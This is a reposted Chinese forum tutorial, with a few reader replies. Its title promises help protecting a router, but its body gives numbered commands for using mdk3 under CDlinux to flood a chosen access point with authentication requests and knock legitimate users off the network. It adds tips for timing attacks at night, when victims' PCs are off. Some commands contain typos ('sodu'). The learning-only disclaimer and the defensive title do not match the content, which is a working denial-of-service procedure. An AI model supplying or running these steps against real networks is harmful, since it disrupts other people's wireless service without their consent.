【无线安防】如何防止路由器被攻击，保护隐私安全

hgiyg

本教程转载自作者：甄下流，感谢分享~！

申明: 本文测试所用的无线设备均属本人, 且仅为学习目的. 强烈反对任何人用来作违法的行为。

如需转载，请注明出处 如意云论坛 技术板块 作者：甄下流                  （这名字真别扭啊）


无线网络DoS攻击软件有： Aireplay-ng; MDK3 etc.. 这类工具。由于Aireplay-ng  每次只可针对特定的 Client 和 AP，当被攻击的client发现异常后，可以通过连接范围内的其他AP躲避这类dos攻击. 而对攻击方来说必需手动转换Client 和 AP, 非常的不方便。



所以我们就来说说MDK3的做法，MDK3 虽说可通过写black_list 和 white_list 来指定将被攻击的 Clients. 但每次也还是针对特定的 AP, 且就我个人来说 MDK3 有些太粗暴了. 有哥们就曾提到在使用 MDK3各类参数组合之后, 有过把某大学的整个无线网络搞崩溃的经验。（所以请谨慎使用）至于问我如何参数组合来攻击整个大学？我是不会告诉你们的（休想拿它干坏事）。
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
首先要知道mdk3到底是个什么东西：
mdk3是一款集成在BackTrack3（简称BT3，目前最为稳定的是BT5也就是BackTrack5），后移植到CDlinux（无线安全侦测系统）。
mdk3是一款无线DOS攻击测试工具，能够发起Beacon Flood、Authentication DoS、Deauthentication/Disassociation Amok等模式的攻击，另外它还具有针对隐藏ESSID的暴力探测模式、802.1X渗透测试、WIDS干扰等等这类功能。（在这里我就不作过多说明，因为这涉及到linux系统的高级命令，这一贴只是教大家如何测试自家路由器的抗洪水能力）
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
以下教程开始：
这一贴我只说说日常的攻击命令（其实攻击一般路由器来说已经足够），高级命令组合有些复杂我这就不说了。
由于我用的是CDlinux，所以就在CDlinux下做教程。（BT系列软件下会有些地方不一样）
首先运行虚拟机，加载CDlinux。
1、开始菜单—终端模拟器
2、输入 sudo mdk3 （注意空格）来运行mdk3
3、在mdk3中输入 sudo ifconfig -a 来侦测网卡
4、在mdk3中输入 sodu airmon-ng start wlan0 来模拟端口（其中wlan0要按你们实际情况来输入，网卡0就填wlan0，1就填wlan1）
5、在mdk3中输入  sudo airodump-ng mon0 来扫描MAC
6、扫描完后，按CTRL+C来停止
7、在mdk3中输入  sodu mdk3 mon0 a -a MAC 来进行攻击（其中MAC不是指输入MAC，而是要输入你要攻击的MAC地址）
          例如：我要攻击的路由器的MAC是00:25:22:4A:E8:1B那么我就要输入 sodu mdk3 mon0 a -a 00:25:22:4A:E8:1B
8、攻击完成后，按CTRL+C来停止。


注：对于新版的CDlinux来说第一步是可以不用打开终端模拟器的直接点击左下角CDlnux图标，依次打开 无线安全 mdk3-v6 就可以~命令都是一样的


本次说的是mdk3的其中一种攻击模式，Authentication DoS mode又叫身份认证攻击，这其实是一种验证模式的攻击，攻击的效果是自动模拟出随机产生的MAC地址向目标AP不断发送验证请求，导致AP忙于处理过多的验证请求而停止正常用户的登录请求，使合法用户无法使用无线网络。（如果不重启路由器那么就会无法使用无线网络）
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
其实mdk3不止是有身份认证攻击还有Beacon Flood Mode、Deauthentication/Disassociation Amok Mode等攻击模式~~~都是些杀伤力大的所以在这里就不教大家了！
——————————————————————————————————————————————————————————————————————————————--


注意：这个办法不是万能的，要更好的成功率请在深夜进行，因为深夜人们都关闭电脑了，而现在一般的电脑都


有36X、金X、腾X管家等等，它们都有防洪水攻击的功能（所以你们懂的） ，由于现在的路由器防认证的效果都


不错，所以攻击的时间得看你家路由器的防洪水效果了！

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
以下是截图教程，步奏和上面的1—8步是一样的，不懂的可以看图：

tom96202

好文。我喜欢。

ycg9603

个人用户不至于吧，谁费劲攻击你？

wxdsd

谢谢分享,楼主好人